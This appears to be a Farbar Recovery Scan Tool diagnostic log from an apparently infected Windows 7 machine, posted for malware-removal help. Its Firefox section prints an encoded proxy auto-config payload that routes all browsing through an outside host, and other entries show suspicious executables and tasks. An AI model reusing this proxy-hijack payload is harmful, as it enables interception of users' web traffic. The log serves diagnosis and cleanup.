FF ProfilePath: C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default [2018-10-18]
FF user.js: detected! => C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\user.js [2017-03-21]
FF Homepage: Mozilla\Firefox\Profiles\r533z996.default -> www.google.com
FF NewTab: Mozilla\Firefox\Profiles\r533z996.default -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\r533z996.default -> autoconfig_url", "data:;base64,ZnVuY3Rpb24gRmluZFByb3h5Rm9yVVJMKHVybCwgaG9zdCkgeyBpZih1cmwuaW5kZXhPZigiaHR0cHM6Ly8iKSA+IC0xKSB7IHJldHVybiAiUFJPWFkgOTg3NjA3LmJpejo4MDgwIjsgfSBlbHNlIHJldHVybiAiSFRUUFMgOTg3NjA3LmJpejo4MDgwIjsgfQ=="
FF Extension: (MEGA) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2018-10-18]
FF Extension: (Hush - private bookmarking) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2017-09-21] [Legacy]
FF Extension: (YouTube mp3) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2017-10-11] [Legacy]
FF Extension: (Double-click Image Downloader) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2018-05-16]
FF Extension: (SafeBrowse) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2016-11-13] [Legacy]
FF Extension: (Google Translator for Firefox) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\[email protected] [2018-10-14]
FF Extension: (Complemento inhabilitación Google Analytics) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\{6d96bb5e-1175-4ebf-8ab5-5f56f1c79f65}.xpi [2018-06-06]
FF Extension: (Password Exporter) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\{B17C1C5A-04B1-11DB-9804-B622A1EF5492}.xpi [2017-07-30] [Legacy]
FF Extension: (Adblock Plus) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2018-08-30]
FF Extension: (Telemetry coverage) - C:\Users\Dango\AppData\Roaming\Mozilla\Firefox\Profiles\r533z996.default\features\{27814f4c-86e6-4100-afda-17ffdc795c99}\[email protected] [2018-10-10] [Legacy]
FF HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2017-04-25]
FF HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-01-26] [Legacy]
FF HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\Dango\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Dango\AppData\Roaming\IDM\idmmzcc5 [2017-05-02] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_31_0_0_122.dll [2018-10-09] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_31_0_0_122.dll [2018-10-09] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\dtplugin\npDeployJava1.dll [2017-08-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.144.2 -> C:\Program Files (x86)\Java\jre1.8.0_144\bin\plugin2\npjp2.dll [2017-08-04] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 10\npnitromozilla.dll [2016-03-03] (Nitro PDF)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-03-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-03-23] (NVIDIA Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-01-20] (VideoLAN)

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-04-27]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2017-04-27]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S4 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
S2 AxAutoMntSrv; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [75624 2012-01-05] (Alcohol Soft Development Team)
R2 ewserver; C:\Program Files\SolidWorks Corp\SolidWorks Electrical\server\EwServer.exe [193024 2014-03-31] (Trace Software International) [File not signed]
R2 IISADMIN; C:\Windows\system32\inetsrv\inetinfo.exe [15872 2010-11-20] (Microsoft Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6347056 2018-09-19] (Malwarebytes)
R2 MSMQTriggers; C:\Windows\system32\mqtgsvc.exe [189440 2010-11-20] (Microsoft Corporation)
S2 MSSQL$TEW_SQLEXPRESS; C:\ProgramData\SolidWorks Electrical\MSSQL11.TEW_SQLEXPRESS\MSSQL\Binn\sqlservr.exe [191064 2012-02-11] (Microsoft Corporation)
R2 NitroDriverReadSpool10; C:\Program Files\Nitro\Pro 10\NitroPDFDriverService10x64.exe [327320 2016-03-03] (Nitro PDF Software)
R2 NitroUpdateService; C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe [417944 2016-03-03] ()
S3 PAExec; C:\Windows\PAExec.exe [189112 2017-08-04] (Power Admin LLC)
S4 RemoteSolverDispatcher; C:\Program Files\SolidWorks Corp\SolidWorks Flow Simulation\binCFW\remotesolverdispatcherservice.exe [235656 2014-03-31] (Mentor Graphics Corporation) [File not signed]
S3 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2016-03-08] (SolidWorks) [File not signed]
S4 SQLAgent$TEW_SQLEXPRESS; C:\ProgramData\SolidWorks Electrical\MSSQL11.TEW_SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [597080 2012-02-11] (Microsoft Corporation)
R2 StarWindServiceAE; C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [370688 2009-12-23] (StarWind Software) [File not signed]
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesService64.exe [2145080 2015-06-25] (TuneUp Software)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 WlanWpsSvc; C:\Program Files\802.11 Wireless LAN\802.11n Wireless USB Adapter HW.17\WlanWpsSvc.exe [167936 2008-02-13] () [File not signed]
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugins" -r

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 CisUtMonitor; C:\Windows\System32\DRIVERS\CisUtMonitor.sys [33360 2011-10-30] (CrystalIdea Software)
S3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2018-09-24] (Disc Soft Ltd)
S3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2018-09-24] (Disc Soft Ltd)
R3 ElbyCDFL; C:\Windows\System32\Drivers\ElbyCDFL.sys [40648 2007-02-15] (SlySoft, Inc.)
R3 ElbyCDFL; C:\Windows\SysWOW64\Drivers\ElbyCDFL.sys [40648 2007-02-15] (SlySoft, Inc.)
R1 HWiNFO; C:\Windows\system32\drivers\HWiNFO64A.SYS [55960 2018-06-02] (REALiX(tm))
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [200232 2018-10-17] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [260384 2018-10-18] (Malwarebytes)
S4 RsFx0200; C:\Windows\System32\DRIVERS\RsFx0200.sys [334936 2012-02-11] (Microsoft Corporation)
R3 rtl819xpn64; C:\Windows\System32\DRIVERS\rtl819xp.sys [622624 2010-02-01] (Realtek Semiconductor Corporation )
S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [11616 2001-08-30] () [File not signed]
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [564824 2016-02-22] (Duplex Secure Ltd.)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\TuneUp Utilities 2014\TuneUpUtilitiesDriver64.sys [31144 2015-06-04] (TuneUp Software)
U3 ai14l3mj; C:\Windows\System32\Drivers\ai14l3mj.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U0 aswVmm; no ImagePath
S2 npf; \??\C:\Windows\system32\drivers\npf.sys [X]
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-18 13:43 - 2018-10-18 13:43 - 000018304 _____ C:\Users\Dango\Desktop\FRST.txt
2018-10-18 13:43 - 2018-10-18 13:43 - 000000000 ____D C:\FRST
2018-10-18 13:41 - 2018-10-18 13:41 - 002414592 _____ (Farbar) C:\Users\Dango\Desktop\FRST64.exe
2018-10-18 13:04 - 2018-10-18 13:04 - 000260384 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-10-18 10:34 - 2018-10-18 12:54 - 000000000 ____D C:\Users\Dango\AppData\Roaming\Package Cache
2018-10-17 23:11 - 2018-10-18 10:46 - 000000866 _____ C:\Users\Public\Desktop\CCleaner.lnk
2018-10-17 23:11 - 2018-10-17 23:11 - 000003870 _____ C:\Windows\System32\Tasks\CCleaner Update
2018-10-17 23:11 - 2018-10-17 23:11 - 000002790 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2018-10-17 23:11 - 2018-10-17 23:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2018-10-17 23:11 - 2018-10-17 23:11 - 000000000 ____D C:\Program Files\CCleaner
2018-10-17 23:10 - 2018-10-17 23:10 - 000001375 _____ C:\Users\Dango\Desktop\AdwCleaner[S01].txt
2018-10-17 22:59 - 2018-10-17 23:03 - 000010556 _____ C:\Users\Dango\Desktop\registro malware.txt
2018-10-17 12:41 - 2018-10-18 10:46 - 000001911 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2018-10-17 12:41 - 2018-10-17 12:41 - 000200232 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2018-10-17 12:41 - 2018-10-17 12:41 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2018-10-17 12:41 - 2018-09-11 13:18 - 000152688 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2018-10-16 10:47 - 2018-10-16 11:33 - 000000000 ____D C:\Users\Dango\AppData\LocalLow\uTorrent
2018-10-15 09:04 - 2018-10-17 12:24 - 000000000 ____D C:\Users\Dango\AppData\Roaming\AppDataFiles
2018-10-14 20:52 - 2018-10-14 20:52 - 002505630 _____ C:\Users\Dango\Desktop\David Copperfield.pdf
2018-10-13 15:04 - 2018-10-14 21:24 - 000000000 ____D C:\Windows\Joomla Standart
2018-10-11 10:28 - 2018-10-11 10:28 - 000000000 ____D C:\Program Files (x86)\Benchmarks
2018-10-11 10:08 - 2018-10-11 10:08 - 000002421 _____ C:\Users\Dango\Desktop\lis.txt
2018-10-11 09:59 - 2018-10-11 10:00 - 000000000 ____D C:\Users\Dango\Desktop\Nueva carpeta
2018-10-10 13:49 - 2018-10-12 12:51 - 000000729 _____ C:\Users\Dango\Desktop\guarapo competencia.txt
2018-10-07 12:42 - 2018-10-07 12:42 - 000000000 ____D C:\Users\Dango\AppData\LocalLow\Snowhound
2018-10-07 12:28 - 2017-04-27 17:50 - 003550208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\D3DCompiler_47.dll
2018-10-07 12:28 - 2017-04-12 08:05 - 004296704 _____ (Microsoft Corporation) C:\Windows\system32\D3DCompiler_47.dll
2018-10-07 12:20 - 2018-10-07 12:36 - 000000819 _____ C:\Users\Public\Desktop\Deep Sky Derelicts.lnk
2018-10-07 12:20 - 2018-10-07 12:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deep Sky Derelicts
2018-10-04 22:04 - 2018-10-04 22:04 - 000000306 _____ C:\Windows\Tasks\AdwCleaner_onReboot.job
2018-10-04 21:49 - 2018-10-04 21:49 - 000000000 ____D C:\Users\Dango\AppData\Local\mbam
2018-10-04 21:48 - 2018-10-17 12:41 - 000000000 ____D C:\Program Files\Malwarebytes
2018-10-04 21:48 - 2018-10-04 21:48 - 000000000 ____D C:\Users\Dango\AppData\Local\mbamtray
2018-10-04 21:27 - 2018-10-04 22:04 - 000000000 ____D C:\AdwCleaner
2018-10-04 11:44 - 2018-10-08 10:48 - 000003726 _____ C:\Windows\System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73}
2018-10-04 11:44 - 2018-10-05 09:13 - 000003436 _____ C:\Windows\System32\Tasks\{DA905C87-7E94-C064-9156-0FA60FF7E39B}
2018-10-04 11:44 - 2018-10-04 11:44 - 000003562 _____ C:\Windows\System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6}
2018-10-04 11:44 - 2018-10-04 11:44 - 000000002 _____ C:\Users\Dango\AppData\Local\imw.ini
2018-09-26 20:22 - 2018-09-27 20:26 - 000000510 _____ C:\Users\Dango\Desktop\competencia mixologia.txt
2018-09-25 21:57 - 2018-09-25 21:57 - 000000210 _____ C:\Users\Dango\Desktop\aaaaa.txt
2018-09-24 15:07 - 2018-10-14 10:24 - 000000000 ____D C:\Users\Dango\Desktop\Vah 11
2018-09-24 11:17 - 2018-09-24 11:17 - 000000000 ____D C:\Users\Dango\AppData\Local\Focus Home Interactive
2018-09-24 11:12 - 2018-09-24 11:12 - 000001086 _____ C:\Users\Dango\Desktop\Cities XL Platinum.lnk
2018-09-24 11:12 - 2018-09-24 11:12 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\(Default)
2018-09-24 11:10 - 2018-09-24 11:12 - 000000000 ____D C:\Program Files (x86)\Cities XL Platinum
2018-09-24 10:38 - 2018-09-24 10:38 - 000000000 ____D C:\Windows\System32\Tasks\AVG
2018-09-24 10:37 - 2018-09-24 10:37 - 000000000 ____D C:\Program Files\Common Files\AVG
2018-09-24 10:35 - 2018-09-24 10:35 - 000000000 ____D C:\Users\Public\Documents\Daemon Tools Images
2018-09-24 10:35 - 2018-09-24 10:35 - 000000000 ____D C:\Users\Public\Documents\Catch!
2018-09-24 10:35 - 2018-09-24 10:35 - 000000000 ____D C:\Users\Dango\AppData\Local\Disc_Soft_Ltd
2018-09-24 10:34 - 2018-09-24 10:34 - 000047672 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtliteusbbus.sys
2018-09-24 10:33 - 2018-09-24 13:41 - 000000000 ____D C:\Users\Dango\AppData\Local\WallpaperSuite
2018-09-24 10:33 - 2018-09-24 13:41 - 000000000 ____D C:\Program Files\DAEMON Tools Lite
2018-09-24 10:33 - 2018-09-24 10:35 - 000000000 ____D C:\Users\Dango\AppData\Roaming\DAEMON Tools Lite
2018-09-24 10:33 - 2018-09-24 10:33 - 000030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2018-09-24 10:33 - 2018-09-24 10:33 - 000000000 ____D C:\ProgramData\DAEMON Tools Lite

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-18 13:44 - 2016-11-18 18:24 - 000000000 ____D C:\Users\Dango\AppData\LocalLow\Mozilla
2018-10-18 13:43 - 2017-05-02 19:02 - 000000000 ____D C:\Users\Dango\AppData\Roaming\IDM
2018-10-18 13:43 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\inf
2018-10-18 13:42 - 2016-02-22 17:04 - 000000000 ____D C:\Users\Dango\AppData\Roaming\DMCache
2018-10-18 13:12 - 2009-07-13 23:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-10-18 13:12 - 2009-07-13 23:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-10-18 13:08 - 2018-02-22 21:36 - 000000388 _____ C:\Windows\Tasks\update-S-1-5-21-4162917515-3570797744-2880415204-1000.job
2018-10-18 13:06 - 2009-07-13 22:20 - 000000000 ____D C:\Windows\system32\inetsrv
2018-10-18 13:04 - 2017-08-04 11:33 - 000000000 ____D C:\ProgramData\NVIDIA
2018-10-18 13:04 - 2009-07-14 00:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-10-18 12:31 - 2016-02-22 17:39 - 000000000 ____D C:\Users\Dango\AppData\Roaming\vlc
2018-10-18 11:13 - 2017-03-17 21:25 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-10-17 23:04 - 2017-02-11 11:11 - 000000000 ____D C:\Users\Dango\AppData\Roaming\Notepad++
2018-10-17 12:41 - 2016-02-22 20:31 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-10-17 10:04 - 2018-02-22 21:36 - 000000388 _____ C:\Windows\Tasks\update-sys.job
2018-10-16 22:56 - 2017-02-21 17:24 - 000000000 ____D C:\Program Files (x86)\Voobly
2018-10-16 22:55 - 2016-09-13 20:52 - 000000000 ____D C:\Users\Dango\AppData\Roaming\.minecraft
2018-10-16 19:02 - 2016-02-22 18:42 - 000000000 ____D C:\Users\Dango\AppData\Roaming\uTorrent
2018-10-15 10:23 - 2016-04-22 11:24 - 000000000 ____D C:\Users\Dango\Desktop\Locale.Emulator.2.1.1.0
2018-10-15 10:23 - 2016-02-22 10:32 - 000000000 ____D C:\Users\Dango\AppData\Local\ElevatedDiagnostics
2018-10-15 09:00 - 2009-07-14 00:08 - 000032636 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2018-10-14 11:04 - 2016-03-08 17:33 - 000000000 ____D C:\Users\Public\Documents\shared mcamx5
2018-10-14 11:04 - 2016-03-08 17:33 - 000000000 ____D C:\Program Files (x86)\mcamx5
2018-10-13 19:34 - 2016-02-22 14:55 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2018-10-13 14:38 - 2016-06-05 14:35 - 000003704 _____ C:\Windows\System32\Tasks\Java Platform SE Auto Updater
2018-10-12 17:09 - 2016-02-22 17:44 - 000000000 ____D C:\Users\Dango\AppData\Roaming\Nitro
2018-10-10 10:42 - 2017-03-03 16:16 - 000000000 ____D C:\Users\Dango\AppData\Local\CrashDumps
2018-10-09 16:44 - 2018-03-13 21:44 - 000004492 _____ C:\Windows\System32\Tasks\Adobe Flash Player NPAPI Notifier
2018-10-09 16:44 - 2016-02-22 14:55 - 000842240 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-10-09 16:44 - 2016-02-22 14:55 - 000175104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2018-10-09 16:44 - 2016-02-22 14:55 - 000004320 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2018-10-09 16:44 - 2016-02-22 14:55 - 000000000 ____D C:\Windows\system32\Macromed
2018-10-07 12:29 - 2016-02-22 15:23 - 000530808 _____ C:\Windows\system32\perfh011.dat
2018-10-07 12:29 - 2016-02-22 15:23 - 000177520 _____ C:\Windows\system32\perfc011.dat
2018-10-07 12:29 - 2016-02-22 13:09 - 002794022 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2018-10-07 12:29 - 2011-04-12 04:10 - 000908374 _____ C:\Windows\system32\perfh00A.dat
2018-10-07 12:29 - 2011-04-12 04:10 - 000223466 _____ C:\Windows\system32\perfc00A.dat
2018-10-07 12:29 - 2009-07-14 00:13 - 002794022 _____ C:\Windows\system32\PerfStringBackup.INI
2018-10-07 12:21 - 2016-02-22 15:10 - 000000000 ____D C:\ProgramData\Package Cache
2018-10-07 12:20 - 2016-02-29 12:51 - 000000000 ____D C:\Windows\SysWOW64\directx
2018-10-04 22:19 - 2018-06-04 22:49 - 000000000 ____D C:\Users\Dango\Desktop\01 Rutine Malwarebytes
2018-10-04 21:57 - 2018-02-25 10:22 - 000000000 ____D C:\Program Files (x86)\Cheat Engine 6.3
2018-10-04 11:44 - 2016-02-22 07:49 - 000000000 ____D C:\Users\Dango
2018-09-28 14:32 - 2018-06-09 20:44 - 000000000 ____D C:\Users\Dango\Desktop\Firefox Pass
2018-09-24 20:13 - 2017-12-07 20:08 - 000000000 ____D C:\zseed
2018-09-24 13:15 - 2016-02-22 20:06 - 000000000 ____D C:\ProgramData\Avg
2018-09-24 13:15 - 2016-02-22 20:05 - 000000000 ____D C:\Users\Dango\AppData\Local\Avg
2018-09-24 11:54 - 2016-10-17 20:42 - 000000000 ____D C:\Users\Dango\Desktop\emplatados

==================== Files in the root of some directories =======

2009-07-13 20:14 - 2009-07-13 20:14 - 000073216 ____N (Microsoft Corporation) C:\Users\Dango\noiSziUSYyUv.exe
2013-02-26 01:28 - 2013-02-26 01:28 - 000027762 _____ () C:\Program Files (x86)\changes.txt
2009-07-13 20:14 - 2009-07-13 20:14 - 000186368 ____N (Microsoft Corporation) C:\Program Files (x86)\fKPUoytri.exe
2013-02-26 01:34 - 2013-02-26 01:34 - 002547384 _____ (Beepa P/L) C:\Program Files (x86)\fraps.exe
2013-02-26 01:34 - 2013-02-26 01:34 - 000234168 _____ (Beepa P/L) C:\Program Files (x86)\fraps32.dll
2013-02-26 01:34 - 2013-02-26 01:34 - 000068792 _____ (Beepa P/L) C:\Program Files (x86)\fraps64.dat
2013-02-26 01:34 - 2013-02-26 01:34 - 000186552 _____ (Beepa P/L) C:\Program Files (x86)\fraps64.dll
2013-02-26 01:30 - 2013-02-26 01:30 - 000140288 _____ (Beepa P/L) C:\Program Files (x86)\frapslcd.dll
2013-02-26 01:27 - 2013-02-26 01:27 - 000001894 _____ () C:\Program Files (x86)\README.HTM
2018-02-22 21:47 - 2018-02-22 21:47 - 000040446 _____ (Beepa Pty Ltd) C:\Program Files (x86)\uninstall.exe
2009-07-13 20:14 - 2009-07-13 20:14 - 000073216 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\aOTSAwA.exe
2016-09-11 18:26 - 2016-09-11 18:26 - 000000046 _____ () C:\Users\Dango\AppData\Roaming\WB.CFG
2018-10-04 11:44 - 2018-10-04 11:44 - 000000002 _____ () C:\Users\Dango\AppData\Local\imw.ini
2016-03-08 22:01 - 2016-08-08 21:44 - 000000000 _____ () C:\Users\Dango\AppData\Local\Temptable.xml
2018-02-22 21:36 - 2018-02-22 21:36 - 000000003 _____ () C:\Users\Dango\AppData\Local\updater.log
2018-02-22 21:36 - 2018-04-01 18:16 - 000000059 _____ () C:\Users\Dango\AppData\Local\UserProducts.xml

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-10-16 18:33

==================== End of FRST.txt ============================

#10

Addition:

 Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10.10.2018
Ran by Dango (18-10-2018 13:44:07)
Running from C:\Users\Dango\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2016-02-22 12:49:41)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-4162917515-3570797744-2880415204-500 - Administrator - Disabled)
Dango (S-1-5-21-4162917515-3570797744-2880415204-1000 - Administrator - Enabled) => C:\Users\Dango
HomeGroupUser$ (S-1-5-21-4162917515-3570797744-2880415204-1002 - Limited - Enabled)
Invitado (S-1-5-21-4162917515-3570797744-2880415204-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\uTorrent) (Version: 3.5.4.44632 - BitTorrent Inc.)
802.11n Wireless USB Adapter HW.17 (HKLM-x32\...\{0CC1ED93-1D13-4127-B1A6-2DDC0D7EBE74}) (Version: 1.00.0000 - CAMEO)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 25.0.0.134 - Adobe Systems Incorporated)
Adobe Flash Player 31 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Adobe Flash Player 31 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 31.0.0.122 - Adobe Systems Incorporated)
Age of Empires II HD The Rise of the Rajas (HKLM\...\YWdlb2ZlbXBpcmVzaWloZA_is1) (Version: 1 - )
Apple Application Support (32 bits) (HKLM-x32\...\{9BA1A894-B42F-4805-BC8C-349C905A3930}) (Version: 5.3.1 - Apple Inc.)
Apple Application Support (64 bits) (HKLM\...\{7EAC8A42-9FAC-4F6B-AABF-C08C9F2E0F13}) (Version: 5.3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
CCleaner (HKLM\...\CCleaner) (Version: 5.47 - Piriform)
Cheat Engine 6.3 (HKLM-x32\...\Cheat Engine 6.3_is1) (Version:  - Cheat Engine)
Cities XL Platinum version 1.00 (HKLM-x32\...\Cities XL Platinum_is1) (Version: 1.00 - )
CloneCD (HKLM-x32\...\CloneCD) (Version:  - SlySoft)
CodeBlocks (HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\CodeBlocks) (Version: 16.01 - The Code::Blocks Team)
Core Temp 1.12.1 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.12.1 - ALCPU)
